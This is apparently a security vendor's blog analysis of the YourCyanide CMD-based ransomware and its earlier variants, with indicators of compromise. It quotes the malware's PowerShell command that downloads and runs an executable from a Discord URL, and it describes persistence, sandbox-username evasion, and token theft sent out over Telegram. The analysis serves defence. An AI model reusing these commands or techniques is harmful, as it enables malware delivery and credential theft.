ALPS blog

YourCyanide: A CMD-Based Ransomware With Multiple Layers of Obfuscation

The Trend Micro Threat Hunting team recently analyzed a series of CMD-based ransomware variants with a number capabilities such as stealing user information, bypassing remote desktop connections, and propagating through email and physical drives.

In this blog entry, we will analyze YourCyanide, the latest variant of the CMD-based ransomware family that started with GonnaCope. YourCyanide is a sophisticated ransomware that integrates PasteBin, Discord, and Microsoft document links as part of its payload download routine. YourCyanide contains multiple layers of obfuscation and takes advantage of custom environment variables and the Enable Delayed Expansion function to hide its activities. As part of its evasion strategy, YourCyanide will also pass through different files, downloading the succeeding files via Discord and Pastebin with each step before eventually downloading the main payload.

Note that the ransomware is still currently under development, so some portions of the routine — like the actual encryption portion — are not finalized (YourCyanide currently renames the files under specific directories, but does not encrypt anything).

Figure 1. An Obfuscated batch script
Figure 1. An Obfuscated batch script

The earliest sample of this ransomware, known as GonnaCope, was found by Twitter user Petrovic in April 2022. This variant possessed the ability to overwrite its victim’s files — however, this was limited to the current directory in which the ransomware was being executed.

Upon checking the latest variant of this malware, we observed that the malware author was sending messages to all users in the compromised network notifying them of the infiltration. Along with this, another message was sent stating that “Kekware and Kekpop were just the begining” — indicating that the author was preparing a more sophisticated variant of the original ransomware.

Figure 2. A message warning victims of potentially more sophisticated variants of the ransomware
Figure 2. A message warning victims of potentially more sophisticated variants of the ransomware

Table 1 shows when the additional variants of the original CMD/BAT-based ransomware were uploaded to VirusTotal.

Date earliest sample was uploaded to VirusTotal Ransomware sample
07 Apr 2022 GonnaCope
07 May 2022 Kekpop
11 May 2022 Kekware
13 May 2022 YourCyanide

Table 1. CMD-based ransomware samples and their date of upload to VirusTotal

YourCyanide technical analysis

Infection flow

 Figure 3. YourCyanide infection routine
Figure 3. YourCyanide infection routine
Figure 4. Exfiltration of stolen information
Figure 4. Exfiltration of stolen information

Arrival

It initially arrives as an LNK file that contains the following PowerShell script for downloading the “YourCyanide.exe” 64-bit executable from Discord and executing it:

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command “(New-Object Net.WebClient).DownloadFile(‘hxxps://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe’, ‘YourCyanide.exe’)”; start YourCyanide.exe”

Figure 5. LNK file containing the shellcode
Figure 5. LNK file containing the shellcode

This 64-bit executable file creates and executes a CMD file with the filename YourCyanide.cmd.

Figure 6. Creating and executing YourCyanide.cmd
Figure 6. Creating and executing YourCyanide.cmd

The dropped YourCyanide.cmd file contains a script downloaded from Pastebin that is saved using the same filename (YourCyanide.cmd).

Figure 7. Code snippets from the YourCyanide.cmd file
Figure 7. Code snippets from the YourCyanide.cmd file

The ransomware will create a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce for cleanup purposes. It then runs advpack.dll to delete the folder containing the malicious CMD file to remove traces of the downloader from the machine.

Figure 8. Creating a registry key for cleanup
Figure 8. Creating a registry key for cleanup

Analyzing YourCyanide.cmd

The downloaded script file contains 10 layers of obfuscated code, with each layer being needed to deobfuscate the succeeding layer. It takes advantage of the Enable Extensions and Enable Delayed Extensions commands, causing variables within a batch file to be expanded at execution time rather than at parse time.

The malware uses following format for its obfuscation technique:

%parameter:~index of character, number of characters to take%

%Kesik:~19,1%, will return 1 character from the index value 19 of parameter Kesik

Figure 9. Code snippets showing Enable Extensions and Enable Delayed Extensions commands
Figure 9. Code snippets showing Enable Extensions and Enable Delayed Extensions commands

Upon execution, YourCyanide sets its file attributes as hidden and as a system file, then launches five maximized Command Prompt windows.

Figure 10. Launching five maximized Command Prompt windows
Figure 10. Launching five maximized Command Prompt windows

It will then try to add a user “session” to the Administrators group using the net localgroup command.

Figure 11. The net localgroup command being run
Figure 11. The net localgroup command being run

It also creates an autostart mechanism for persistence by creating a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\Run and then copying itself to the Startup directory. It also disables Task Manager by modifying its registry entry.

Figure 12. Code snippet showing YourCyanide creating a registry key and copying itself to the Startup directory for persistence.
Figure 12. Code snippet showing YourCyanide creating a registry key and copying itself to the Startup directory for persistence.

It then checks if %SystemDrive%\AutoExec.bat exists, and if so, it deletes the original and then copies itself and sets the file to read only, hidden, and as a system file.

It also avoids machines with the following usernames, some of which, according to our research, are usernames used by malware researchers and sandbox systems — implying that the malware author is noting which machines should be evaded:

  • a.monaldo 
  • George
  • george
  • help
  • karolisliucveikis 
  • Soumy
  • guent

After checking the username of the infected machine, it drops and executes a batch file in UserProfile\Documents\black.bat. This batch file is responsible for continuously opening the Blank Screen Saver file, which renders the machine inaccessible while the malware is running.

Figure 13. Dropping and executing the batch file
Figure 13. Dropping and executing the batch file

YourCyanide also terminates several services and security applications by concatenating variables to form the strings “net stop,” “norton,” “symantec,” and “McAfee.”

Figure 14. Code snippet showing YourCyanide stopping services and security software
Figure 14. Code snippet showing YourCyanide stopping services and security software
Figure 14. Code snippet showing YourCyanide stopping services and security software
Figure 14. Code snippet showing YourCyanide stopping services and security software

It then swaps the mouse button using the SwapMouseButton Export function of the user32.dll file.

After terminating applications, it renames files from the following directories to <Random>.<file extension>.<Random>.cyn:

  • %MyDesktop%
  • %MyDocuments%
  • %MyMusic%
  • %MyPictures%
  • %MyVideos%
  • %Downloads%

Although no actual encryption is being performed, users will still be heavily inconvenienced due to their files being renamed — especially for those with large amounts of files in these particular folders. Furthermore, since the malware is still currently under development, it’s likely that the malware authors are still finalizing the encryption portion of the routine.

It then creates the following ransom notes and drops them into %MyDesktop%:

  • YcynNote.txt
  • other.txt
Figure 15. The ransom notes dropped by YourCyanide (including the warning shown in Figure 2)
Figure 15. The ransom notes dropped by YourCyanide (including the warning shown in Figure 2)
Figure 15. The ransom notes dropped by YourCyanide (including the warning shown in Figure 2)

It features two instances in which it copies itself to batch files and then appends the malicious code (shown in Figure 16) to win.ini and system.ini.

Figure 16. The malicious code that are appended to win.ini and system.ini
Figure 16. The malicious code that are appended to win.ini and system.ini
Figure 16. The malicious code that are appended to win.ini and system.ini

After performing its routine, it deletes the black.bat file in the %MyDocuments% directory, which is responsible for rendering the machine inaccessible. Deleting the file will stop the blank screen saver file from continuously opening.

Figure 17. The black.bat file responsible for rendering the infected machine inaccessible
Figure 17. The black.bat file responsible for rendering the infected machine inaccessible

Lateral movement

YourCyanide is also capable of spreading via email and to different drives. It creates two VBScript files, mail.vbs and loveletter.vbs, that send an email using the following subjects (with itself as an attachment):

  • I Have a crush on you
  • Check This Out

It then copies itself to the following drives or directories:

  • D:
  • E:
  • F:
  • G:
  • H:
  • %UserProfile%

Bypassing remote desktop connections and firewalls

YourCyanide enables Remote Desktop Connection (RDP) by using the netsh commands shown in Figure 18.

Figure 18. Using netsh commands for RDP connection
Figure 18. Using netsh commands for RDP connection

The ransomware opens multiple local ports by adding firewall rules for Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) connections via the netsh advfirewall function.

Figure 19. Opening multiple local ports
Figure 19. Opening multiple local ports

It then downloads and executes another CMD file (ycynlog.cmd) from hxxps://pastebin[.]com/raw/2K5m42Xp.

Exfiltration of stolen information

The ycynlog.cmd file is responsible for the collection and exfiltration of stolen information from the compromised machine. Like the main file, it also features multiple layers of obfuscation. Upon execution, the file hides itself and creates its autostart mechanism by producing a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and by copying itself to the Startup directory.

The malware uses the Telegram chatbot API to exfiltrate the stolen information and sets it to variable “Webhook”

Figure 20. Using the Telegram Chatbot API for data exfiltration
Figure 20. Using the Telegram Chatbot API for data exfiltration

It downloads another executable from Discord (GetToken.exe). Running this executable creates the file MyTokens.txt, which contains stolen access token data from different applications such as Chrome, Discord, and Microsoft Edge.

Figure 21. Downloading GetToken.exe
Figure 21. Downloading GetToken.exe
Figure 21. Downloading GetToken.exe
Figure 21. Downloading GetToken.exe

It also collects the following machine information and stores it in userdata.txt:

  • IP addresses
  • MAC addresses
  • CPU Information
  • Memory Size
  • Partition information
  • System specifications
  • OS product key
  • Currently running processes

Both Tokens.txt and userdata.txt will then be sent via Telegram chatbot API using the curl command.

We also discovered that YourCyanide exfiltrates Minecraft-related credentials.

Figure 22. Exfiltrating Minecraft-related credentials
Figure 22. Exfiltrating Minecraft-related credentials

Finally, it downloads another executable from Google Docs and executes it using the parameter “/stext ForME.txt”. ForMe.txt will then be sent to the Telegram chatbot. While the Google Docs link is currently inaccessible, and therefore a sample can’t be sourced, we noticed that it is run using the same parameter as the sample “passwords.exe,” which is also used by the earlier Kekpop variant. The parameter “/stext” is employed when executing the file, which is similar to the WebBrowserPassView application used to retrieve credentials stored by various web browsers such as Internet Explorer (Version 4.0 – 10.0), Mozilla Firefox (all versions), Google Chrome, Safari, and Opera.

Figuring 23. Downloading the executable from Google Docs
Figuring 23. Downloading the executable from Google Docs

The file created from executing passwords.exe contains saved passwords that are stored in Google Chrome.

Figure 24. The file created from executing passwords.exe
Figure 24. The file created from executing passwords.exe

Avoiding usernames

Of the usernames this malware avoids, three in particular stand out. Namely: a.monaldo, karolisliucveikis, and soumy. Upon further research, we discovered that these are usernames   from sandbox environments.

a.monaldo

 

The username of the sandbox machine used by Hunter Yomi

Figure 25. Screenshot showing the a.monaldo username Image from yomi.yoroi.company
Figure 25. Screenshot showing the a.monaldo username Image from yomi.yoroi.company

karolisliucveikis

The username of the sandbox machine used by PCRisk

Figure 26. Screenshot showing the karolisliucveikis username Image from pcrisk.com
Figure 26. Screenshot showing the karolisliucveikis username Image from pcrisk.com
Figure 27. Screenshot showing the soumy username Image from sonicwall.com
Figure 27. Screenshot showing the soumy username Image from sonicwall.com

Variant Comparison

The team analyzed these CMD-based ransomwares and came up with the following table that compares each variant and their differences. One notable difference is that GonnaCope, the earliest variant, does not collect user credentials from web browsers and list of applications, and does not enable RDP connections. Furthermore, it does not execute black.bat, the file that temporarily causes the machine to become inaccessible while the malware executes its payload. We also observed that the BTC address used by GonnaCope is different from the BTC address of the succeeding variants and it contains a different ransom note format. The variants also differ in their delivery —  shifting between arriving as an archive, executable files, or LNK files that drop the CMD-based ransomware. The payloads are also located in different parts of the chain, with some being found in the main CMD file, while others are found in files that are downloaded from Pastebin and Discord.

Behavior GonnaCope Kekware Kekpop YourCyanide
Creates auto-start mechanism Yes Yes Yes Yes
Disables task manager Yes Yes Yes Yes
Checks the username of the machine No Yes Yes Yes
Creates and executes black.bat to continuously turn on Blank Screen Saver No Yes Yes Yes
Stops services Yes Yes Yes Yes
Terminates applications Yes Yes Yes Yes
Swaps mouse buttons Yes Yes Yes Yes
Renames files GonnaCope.cope
random.cope
<Random>.<file extension>.<Random>.cyn <Random>.<file extension>.<Random>.kekpop <Random>.<file extension>.<Random>.cyn
Gathers a list of installed applications No Yes Yes Yes
Collects machine information Yes Yes Yes Yes
Collects token access data Yes Yes Yes Yes
Collects passwords saved in web browsers No Yes Yes Yes
Sends an email with a copy of itself as an attachment Yes Yes Yes Yes
Subject of sent email Is this you?
Here is that document you needed
I Have a crush on you
Check This Out
I Have a crush on you I Have a crush on you
Check This Out
Copies itself in drives Yes Yes Yes Yes
Enables RDP connection No Yes Yes Yes
Ransom note message Your files are unusable pay $100 in bitcoin to bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll to get your files back or allow it into outlook for a decryption key Q: What happened to my files
A: They got encrypted by kekware.
Q: how can i get them back
A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf.
Q: What happens if i dont pay
A: You will never get your files back.
Q: What happened to my files?
A: They got encrypted by kekpop.Q: how can i get them back?
A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf

Q: What happens if i dont pay?
A: You will never get your files back.

Q: Is this related to kpop?
A: No fuck kpop

Q: What happened to my files?
A: Oops! your files have been encrypted by YourCyanide.
.
Q: how can I get them back?
A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf.
.
Q: What happens if I dont pay
A: You will never get your files back.
.
Q: How can I contact you
A: contact at yourcyanide.help@gmail.com
++++++++++++++++++++++++++++++++++++++++++++
RAndOm Files have been encrypted
Other messages kekpop is on your network Kekware and kekpop were just the beginning
BTC wallet used bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf

Conclusion

The continued use of heavily obfuscated script results in very low detections for these CMD-based ransomware, making it easier to compromise their victims’ machines. Even if the technique is not new, the use of multilayer custom environment variables for obfuscation is highly effective in avoiding detection. These ransomware variants are also capable of downloading multiple payloads, performing lateral movement via emails, and using Discord, Pastebin and even Microsoft document links.

Figure 28. Low detections of CMD-based ransomware
Figure 28. Low detections of CMD-based ransomware

From our analysis, we are able to infer that the malware author is actively monitoring the reports created by malware researchers by taking note of the usernames found in their sandbox logs and reports, and including them in the evasion list of usernames and machines that is part of the initialization process of the malware being used.

Ransomware variants that possess multiple capabilities — such as the one analyzed in this blog entry — are gaining popularity. While YourCyanide and its other variants are currently not as impactful as other families, it represents an interesting update to ransomware kits by bundling a worm, a ransomware, and an information stealer into a single mid-tier ransomware framework.

It is also likely that these ransomware variants are in their development stages, making it a priority to detect and block them before they can evolve further and do even more damage.

Trend Micro solutions

A multilayered approach can help organizations defend against ransomware attacks using security technologies that can detect malicious components and suspicious behavior.

  • Trend Micro Vision One™ provides multilayered protection and behavior detection, which helps block suspicious behavior and tools before the ransomware can do any damage.
  • Trend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities through virtual patching and machine learning.
  • Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails that can serve as entry points for ransomware.
  • Trend Micro Apex One™ offers automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring endpoint protection.

Indicators of Compromise

GONNACOPE
File SHA256 Detection
GonnaCope.Bat ab71472e5a66740369c70715245a948d452a59ea7281233d6ad4c53dfa36b968 Trojan.BAT.GONNACOPE.A
GonnaCope.Bat 0dff760288b3dfebc812761a2596563e5f0aea8ffc9ca4a4c26fa46e74311122 Trojan.BAT.GONNACOPE.THEOEBB
GonnaCopeDL f9fdfb0d4e2d2ea06ce9222280cd03d25c9768dfa502b871846153be30816fd3 Trojan.MSIL.GONNACOPE.A
GonnaCopeCryptor 2987b5cacc9de6c3a477bd1fc21b960db3ea8742e3b46906d134aa8b73f17280 Ransom.MSIL.GONNACOPE.YXCEE
GonnaCope 7388722c3a19854c1ccf19a92798a7cef0efae538e8e8ecf5e79620e6a49cea7 TrojanSpy.MSIL.GONNACOPE.A
GonnaCopeRansNote 7edb2d152d8744343222b1b93ff846616fc3ca702e96c7e7a3663d2d938d8374 Ransom.MSIL.GONNACOPE.A.note
mail.vbs 26bde18048c32f6612d8d76b8696b2ce59db227913dccd51f696b51640ee11e9 Worm.VBS.GONNACOPE.A
msg.vbs ca84abd94b65d69ee8d26ffc3cc63a5a0886136e63d405ac293fefecc1d2ff3a PUA.VBS.GonnaLoop.A
msgbox.vbs d12e08e5dd94021dfa59d36d3adfe7f47df180023a04be781fa7695adc5ccc54 PUA.VBS.GonnaLoop.A
nokeyboard.reg a029ae77eced03e515a2acb0ee8ebecf3aebea402e441beef1615e3488234f8e PUA.Win32.Disabler.A
Readme.txt 9c39b7535b527df3b70800562bad98dc2e046de321fe3914dab896eda753cf38 Ransom.Win32.GONNACOPE.YXCEW.note
downloader.vbs 45189864b6ff6d844d27b59123d2cd461f539d42b362e60e49da50119f0b7083 Trojan.VBS.GONNACOPE.A
KEKPOP
File SHA256 Detection
Arrival c8d6298f5ef09a324bb6afc7bb4550857fbd0fcbaea2b315b4f00d78bcc6a262  Trojan.BAT.KEKPOP.THEACBB
296ba1469d072c37c6361fe80ba396a92f6461b9562103a3b5a20841d0757722
Main File bfd9336deeb399f412c51f8f6797e6b5dc81afa1f1638ab937a28df733a78c0f Ransom.BAT.KEKPOP.THEAABB
f8a0d9ea41c2b9082f9aebbc7e337b22d1092dd307ccd34d71fdbd56fd94a41d
1e791e8511ac29bf4fd2a289ed35bb24151a7b0bfa3ab9854b2a586ede050a54
d2d25dee61b17133415b4856412f20134823177effccd53a1f14677d372a4b56
Dropped BAT File 1 Trojan.BAT.KEKPOP.THEACBB
Dropped BAT File 2 9b087a352fcb0a61545dbd68f7dfa32e0e15f98ca1547207d9ff918881ff5c75 TrojanSpy.BAT.KEKPOP.THEACBB
Dropped BAT File 3 7fed00a9456b6945813f46294d2f587e7486b38917a8818a77774a2a8e2cfe9b Trojan.BAT.KEKPOP.THEACBB
Dropped Text File Ransom.BAT.KEKPOP.THEACBB.note
Dropped HTML File Ransom.HTML.KEKPOP.THEACBB.note
Passwords.exe 53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56 HackTool.Win32.NirsoftPT.SM
GetToken.exe 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 Trojan.MSIL.TOKENSTEALER.YXCES
kekpopdicord.exe e5f589027e859e8bedb2d5fbecff37dcf7bcf7e4af6671c1c0c9aac9b6712913 Trojan.Win64.KEKPOP.YXCET
Trojan.BAT.KEKPOP.YXCEZ
KEKWARE
File SHA256 Detection
Arrival 3262ece43e7135c9ed6788588bae269ed75db800964d48cfb762542e0d003259 Trojan.PS1.KEKPOP.YXCEST
23269070507a70c34a4e219f9be19943211ed38eec4a9ce2b3a49bf76676a5e3 Trojan.PS1.KEKPOP.YXCEST
Main File e0946a55e9cbdb3485f154f72994bad765b74ba280a2149485af113503b7dc78 Trojan.BAT.KEKPOP.YXCEST
YcynNote.txt 602533e3c67a248e4dc152fa266a372dd2b2d82ff68fdc17c1591ecc429147bc Ransom.BAT.KEKPOP.YXCEST.note
rAndom.cmd 7fed00a9456b6945813f46294d2f587e7486b38917a8818a77774a2a8e2cfe9b Trojan.BAT.KEKPOP.THEACBB
cynlog.cmd 9b087a352fcb0a61545dbd68f7dfa32e0e15f98ca1547207d9ff918881ff5c75 TrojanSpy.BAT.KEKPOP.THEACBB
Passwords.exe 53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56 HackTool.Win32.NirsoftPT.SM
GetToken.exe 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 Trojan.MSIL.TOKENSTEALER.YXCES
black.bat 07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85 Trojan.BAT.KEKPOP.YXCEST
loveletter.vbs f0afc40bec9453d38f2cd7d70e25bc76797839c2d28180904295639080013416 Worm.VBS.MASSMAIL.YXCEST
mail.vbs 080c4f412087aa3b652e8777ea00c801424ad6c4326bf020b9c264440e37c868 Worm.VBS.MASSMAIL.YXCEST
fasdgfsdga.cmd 56622656231060b6401dcea515953d517fd9212b8de66c33c4847840aa958c83 Trojan.BAT.POWLOAD.TIAOELC
YOURCYANIDE
File SHA256 Detection
LNK 31655244d3b77ae661f10199cd823f54c473d92a88ae892ee1b75bc5794482ad Trojan.LNK.KEKPOP.YXCEST
9e973f75c22c718c7438bc1d4614be11ae18e2d5140ecc44c166b5f5102d5fbe Trojan.LNK.KEKPOP.YXCERT
c5d842735709618ee4f2521c95bf029a0690c3cbe5f7a06a916f633ebe09dd50 Trojan.LNK.KEKPOP.YXCERT
f9a2c524c270d581b83c010136402c00623bb36b2dd7758ea5e59c9369fa7649 Trojan.LNK.KEKPOP.YXCERT
Win64 EXE Dropper 8249d6e886a97aec60d35d360773e76c6630d822817dabe1c7674a0b51965669 Trojan.Win64.KEKPOP.YXCEST
d51538d8da12af8ae36f95b645e76218e4fd61ab433504a3900c14942160446c Trojan.Win64.KEKPOP.YXCERT
6a645f72acf1d6c906e8c844e4e8b3fc92c411bf69937cfe7069df2cc51b8a4e Trojan.Win64.KEKPOP.YXCERT
2f2fac2c91268a9b31401633b63a374242e46919dc21106466c6c05bab3ce3f8 Trojan.Win64.KEKPOP.YXCERT
a180c31666788fb6a7da421a743bb1c487099297ec06f2bdd841f342021f3763 Trojan.Win64.KEKPOP.YXCERT
Downloader of the payload b43d1af1abeef8b552f0b362b2162c3a940a843f5474518c665e145b3aa01ace Trojan.PS1.KEKPOP.YXCEST
6e33a2c56b7b32be8e99a15920cf179b4e7aa62eaef8496ace67261543569c25 Trojan.LNK.KEKPOP.YXCERT
Main File (YourCyanide.cmd) 6ab0e2e13c32b18b06b9b93b1fe607a7e04a5c0ba09816c36fba1573a47ded91 Trojan.BAT.KEKPOP.AB
f8860ce270a2dec3ae1c51ff2c9aea5efe0015d519ebac4ca4c1ac0d97e73323 Ransom.BAT.KEKPOP.YXCERT
8f0dbf9a6841ced62d7f5c130f420bd5a2b39141097fefba9727034d1bf3b402 Ransom.BAT.KEKPOP.YXCERT
67a1e573955304887d30ff924eb01ba8a60a188835d7275265ecc716360fb0cf Ransom.BAT.KEKPOP.YXCERT
a3523e2ba2c221593a0c16640bfeef8cd146f747fa62620cc2834e417578c34c Ransom.BAT.KEKPOP.YXCERT
0ed64dd6e08e5b9c9282966f439ab8881b4611052838db1ef79fabc38b8a61d2 Ransom.BAT.KEKPOP.YXCERT
black.bat 07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85 Trojan.BAT.KEKPOP.YXCEST
ycynlog.cmd 298c325bbc80af8b3ac77365dd7cc3f97000a8377f36937d8563ab743a92b21c TrojanSpy.BAT.KEKPOP.YXCEST
YcynNote.txt 4e455d4b353c7cce0155ce1050afc30d064fd93c57bc6428eb3cd988ecd855f0 Ransom.BAT.KEKPOP.YXCERT.note
other.txt a4c3412ac96061561c6cf05a259dd14e5151fe66eee115ff154d6a0366ba1a12 N/A – non-malicious component
loveletter.vbs f0afc40bec9453d38f2cd7d70e25bc76797839c2d28180904295639080013416 Worm.VBS.MASSMAIL.YXCEST
mail.vbs 080c4f412087aa3b652e8777ea00c801424ad6c4326bf020b9c264440e37c868 Worm.VBS.MASSMAIL.YXCEST
GetToken.exe 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 Trojan.MSIL.TOKENSTEALER.YXCES
ForMe.exe N/A
316403043e4135474637c0e3f958e72015a08242dc2712f7635012e253cb81b2 Trojan.LNK.KEKPOP.YXCEST
6a95f52d228316f9b48618a1c728e1c47ec71843e5b4cfb76ab3ef86dcd8cf8c Trojan.LNK.KEKPOP.YXCEST
Read_Me.txt.cmd 77fd8fba88236d5f55bbb12dbaaa69ee7673397d8606c0c67b22ce523af818cd Trojan.BAT.POWLOAD.TIAOELB
Main File (WinBugsFix.cmd) 40b923db9c5da6b3bfe345139c42a71e2fd124de6a2808f8cec2a979a044f191 Ransom.BAT.KEKPOP.YXCEST
b0f7c2021c00a1d495f408295d161befa3faceab02d9c4047cee4904db6c1272 Ransom.BAT.KEKPOP.YXCEST

 

Facebook
Twitter
LinkedIn

Featured News